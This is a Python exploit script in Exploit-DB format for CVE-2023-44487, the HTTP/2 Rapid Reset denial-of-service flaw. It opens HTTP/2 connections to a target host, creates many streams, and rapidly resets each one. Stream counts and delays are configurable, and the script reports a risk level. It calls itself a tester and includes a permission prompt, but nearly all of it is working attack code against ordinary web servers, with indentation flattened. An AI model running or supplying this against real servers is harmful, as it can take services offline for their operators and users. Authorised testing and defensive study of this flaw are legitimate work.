#!/usr/bin/env python3
"""
# Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
# Google Dork: -NA-
# Date: 29th August 2025
# Exploit Author: Madhusudhan Rajappa
# Vendor Homepage: -NA-
# Software Link: -NA-
# Version: HTTP/2.0
# Tested on: -NA-
# CVE : CVE-2023-44487
"""
import asyncio
import ssl
import time
import argparse
import logging
from typing import Optional, Tuple
import statistics
try:
import h2.connection
import h2.events
import h2.exceptions
import h2.config
except ImportError:
print("Error: h2 library not installed. Install with: pip install h2")
exit(1)
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
class HTTP2RapidResetTester:
"""Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability."""
def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
self.host = host
self.port = port
self.use_ssl = use_ssl
self.connection = None
self.reader = None
self.writer = None
self.response_times = []
self.errors = []
self.connection_closed = False
async def connect(self) -> bool:
"""Establish HTTP/2 connection to the target server."""
try:
logger.info(f"Connecting to {self.host}:{self.port}")
if self.use_ssl:
ssl_context = ssl.create_default_context()
ssl_context.set_alpn_protocols(['h2'])
self.reader, self.writer = await asyncio.open_connection(
self.host, self.port, ssl=ssl_context
)
else:
self.reader, self.writer = await asyncio.open_connection(self.host, self.port)
# Initialize HTTP/2 connection
config = h2.config.H2Configuration(client_side=True)
self.connection = h2.connection.H2Connection(config=config)
self.connection.initiate_connection()
# Send connection preface
await self._send_data(self.connection.data_to_send())
logger.info("HTTP/2 connection established successfully")
self.connection_closed = False
return True
except Exception as e:
logger.error(f"Failed to establish connection: {e}")
return False
async def _send_data(self, data: bytes):
"""Send data to the server."""
if data and self.writer and not self.connection_closed:
try:
self.writer.write(data)
await self.writer.drain()
except (ConnectionResetError, BrokenPipeError, OSError) as e:
logger.debug(f"Connection error while sending data: {e}")
self.connection_closed = True
async def _receive_data(self) -> bytes:
"""Receive data from the server."""
try:
if self.connection_closed or not self.reader:
return b''
data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0)
if not data:
self.connection_closed = True
return data
except asyncio.TimeoutError:
return b''
except (ConnectionResetError, BrokenPipeError, OSError) as e:
logger.debug(f"Connection error while receiving data: {e}")
self.connection_closed = True
return b''
async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
"""
Perform the rapid reset attack test.
Args:
num_streams: Number of streams to create and reset
delay: Delay between stream creations (seconds)
Returns:
Dictionary with test results
"""
logger.info(f"Starting rapid reset test with {num_streams} streams")
start_time = time.time()
created_streams = []
reset_streams = []
try:
# Phase 1: Rapidly create streams
for i in range(num_streams):
if self.connection_closed:
logger.warning("Connection closed during stream creation")
break
stream_id = (i * 2) + 1 # Odd numbers for client-initiated streams
# Create HTTP/2 headers
headers = [
(':method', 'GET'),
(':path', '/'),
(':scheme', 'https' if self.use_ssl else 'http'),
(':authority', self.host),
('user-agent', 'CVE-2023-44487-Tester/1.0'),
]
try:
# Send headers to create stream
self.connection.send_headers(stream_id, headers)
await self._send_data(self.connection.data_to_send())
created_streams.append(stream_id)
# Small delay to avoid overwhelming the connection
if delay > 0:
await asyncio.sleep(delay)
except Exception as e:
self.errors.append(f"Error creating stream {stream_id}: {e}")
if "connection" in str(e).lower():
break
logger.info(f"Created {len(created_streams)} streams")
# Phase 2: Rapidly reset all streams
reset_start = time.time()
for stream_id in created_streams:
if self.connection_closed:
logger.warning("Connection closed during stream reset")
break
try:
# Send RST_STREAM frame to cancel the request
self.connection.reset_stream(stream_id, error_code=0x8) # CANCEL error code
await self._send_data(self.connection.data_to_send())
reset_streams.append(stream_id)
if delay > 0:
await asyncio.sleep(delay / 10) # Faster resets
except h2.exceptions.StreamClosedError:
# Stream already closed, continue
pass
except Exception as e:
self.errors.append(f"Error resetting stream {stream_id}: {e}")
if "connection" in str(e).lower():
break
reset_duration = time.time() - reset_start
total_duration = time.time() - start_time
logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")
# Phase 3: Monitor server response
await self._monitor_server_response(timeout=10.0)
return {
'streams_created': len(created_streams),
'streams_reset': len(reset_streams),
'total_duration': total_duration,
'reset_duration': reset_duration,
'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
'errors': len(self.errors),
'response_times': self.response_times.copy(),
'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
'connection_closed': self.connection_closed
}
except Exception as e:
logger.error(f"Error during rapid reset test: {e}")
return {'error': str(e)}
async def _monitor_server_response(self, timeout: float = 10.0):
"""Monitor server responses and measure response times."""
logger.info("Monitoring server responses...")
end_time = time.time() + timeout
while time.time() < end_time and not self.connection_closed:
try:
start = time.time()
data = await self._receive_data()
response_time = time.time() - start
if data:
self.response_times.append(response_time)
try:
# Process HTTP/2 events
events = self.connection.receive_data(data)
for event in events:
if isinstance(event, h2.events.ResponseReceived):
logger.debug(f"Response received on stream {event.stream_id}")
elif isinstance(event, h2.events.StreamReset):
logger.debug(f"Stream {event.stream_id} reset by server")
elif isinstance(event, h2.events.ConnectionTerminated):
logger.warning("Server terminated connection")
self.connection_closed = True
return
except Exception as e:
logger.debug(f"Error processing HTTP/2 events: {e}")
await asyncio.sleep(0.1)
except Exception as e:
self.errors.append(f"Error monitoring response: {e}")
break
async def baseline_test(self, num_requests: int = 10) -> dict:
"""Perform baseline test with normal HTTP/2 requests."""
logger.info(f"Performing baseline test with {num_requests} normal requests")
start_time = time.time()
successful_requests = 0
for i in range(num_requests):
if self.connection_closed:
logger.warning("Connection closed during baseline test")
break
stream_id = (i * 2) + 1
headers = [
(':method', 'GET'),
(':path', '/'),
(':scheme', 'https' if self.use_ssl else 'http'),
(':authority', self.host),
('user-agent', 'CVE-2023-44487-Baseline/1.0'),
]
try:
request_start = time.time()
self.connection.send_headers(stream_id, headers)
self.connection.end_stream(stream_id)
await self._send_data(self.connection.data_to_send())
# Wait for response
try:
data = await asyncio.wait_for(self._receive_data(), timeout=5.0)
if data:
self.response_times.append(time.time() - request_start)
successful_requests += 1
except asyncio.TimeoutError:
logger.warning(f"Timeout waiting for response to request {i+1}")
await asyncio.sleep(0.1) # Small delay between requests
except Exception as e:
logger.warning(f"Error in baseline request {i+1}: {e}")
if "connection" in str(e).lower():
break
total_duration = time.time() - start_time
return {
'total_requests': num_requests,
'successful_requests': successful_requests,
'total_duration': total_duration,
'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
'success_rate': successful_requests / num_requests if num_requests > 0 else 0
}
async def close(self):
"""Close the connection gracefully."""
if self.writer and not self.connection_closed:
try:
# Try to close the connection gracefully
if self.connection:
try:
# Send GOAWAY frame if possible
self.connection.close_connection()
await self._send_data(self.connection.data_to_send())
except Exception as e:
logger.debug(f"Error sending GOAWAY frame: {e}")
# Close the writer
self.writer.close()
# Wait for close with timeout to avoid hanging
try:
await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0)
except asyncio.TimeoutError:
logger.debug("Timeout waiting for connection to close")
except (ConnectionResetError, BrokenPipeError, OSError):
# Connection already closed by peer, this is expected
pass
except Exception as e:
logger.debug(f"Error during connection cleanup: {e}")
finally:
self.connection_closed = True
async def main():
parser = argparse.ArgumentParser(
description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
epilog='WARNING: Only use on systems you own or have permission to test!'
)
parser.add_argument('host', help='Target hostname')
parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
parser.add_argument('-s', '--streams', type=int, default=100,
help='Number of streams for rapid reset test (default: 100)')
parser.add_argument('-d', '--delay', type=float, default=0.001,
help='Delay between stream operations (default: 0.001s)')
parser.add_argument('--baseline-only', action='store_true',
help='Only perform baseline test')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
print("=" * 60)
print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
print("=" * 60)
print(f"Target: {args.host}:{args.port}")
print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
print()
# Legal disclaimer
print("LEGAL DISCLAIMER:")
print("This tool is for authorized security testing only.")
print("Ensure you have permission to test the target system.")
print("Unauthorized use may be illegal.")
print()
response = input("Do you have permission to test this system? (yes/no): ")
if response.lower() != 'yes':
print("Exiting. Only use this tool on systems you're authorized to test.")
return
tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
try:
# Connect to target
if not await tester.connect():
logger.error("Failed to establish connection. Exiting.")
return
# Perform baseline test
print("\n" + "="*40)
print("BASELINE TEST")
print("="*40)
baseline_results = await tester.baseline_test()
print(f"Baseline Results:")
print(f" Total Requests: {baseline_results['total_requests']}")
print(f" Successful: {baseline_results['successful_requests']}")
print(f" Success Rate: {baseline_results['success_rate']:.2%}")
print(f" Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
print(f" Total Duration: {baseline_results['total_duration']:.3f}s")
if not args.baseline_only:
# Reset connection for rapid reset test
await tester.close()
tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
if not await tester.connect():
logger.error("Failed to re-establish connection for rapid reset test.")
return
# Perform rapid reset test
print("\n" + "="*40)
print("RAPID RESET TEST (CVE-2023-44487)")
print("="*40)
print(f"Testing with {args.streams} streams...")
rapid_results = await tester.rapid_reset_test(args.streams, args.delay)
if 'error' in rapid_results:
print(f"Test failed: {rapid_results['error']}")
else:
print(f"Rapid Reset Results:")
print(f" Streams Created: {rapid_results['streams_created']}")
print(f" Streams Reset: {rapid_results['streams_reset']}")
print(f" Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
print(f" Total Duration: {rapid_results['total_duration']:.3f}s")
print(f" Reset Duration: {rapid_results['reset_duration']:.3f}s")
print(f" Errors: {rapid_results['errors']}")
print(f" Avg Response Time: {rapid_results['avg_response_time']:.3f}s")
if rapid_results.get('connection_closed'):
print(f" Connection Status: Server closed connection during test")
# Analysis
print("\n" + "="*40)
print("VULNERABILITY ANALYSIS")
print("="*40)
if rapid_results.get('connection_closed'):
print("Server closed connection during rapid reset test")
print(" This could indicate protective measures or resource exhaustion.")
if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
print("WARNING: Server may have rejected many reset requests")
print(" This could indicate protective measures are in place.")
if rapid_results['reset_rate'] > 1000:
print("HIGH RISK: Server accepts very high reset rates")
print(" This may indicate vulnerability to CVE-2023-44487")
elif rapid_results['reset_rate'] > 100:
print("MEDIUM RISK: Server accepts moderate reset rates")
print(" Further testing may be needed")
else:
print("LOWER RISK: Server has rate limiting on resets")
print(" This suggests some protection against the vulnerability")
if len(tester.errors) > rapid_results['streams_created'] * 0.1:
print("Many errors occurred during testing")
print(" Results may not be reliable")
except KeyboardInterrupt:
print("\nTest interrupted by user")
except Exception as e:
logger.error(f"Unexpected error: {e}")
finally:
try:
await tester.close()
except Exception as e:
logger.debug(f"Error during final cleanup: {e}")
print("\nTest completed.")
if __name__ == "__main__":
print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
print("Requires: pip install h2")
print()
try:
asyncio.run(main())
except KeyboardInterrupt:
print("\nExiting...")
except Exception as e:
logger.error(f"Fatal error: {e}")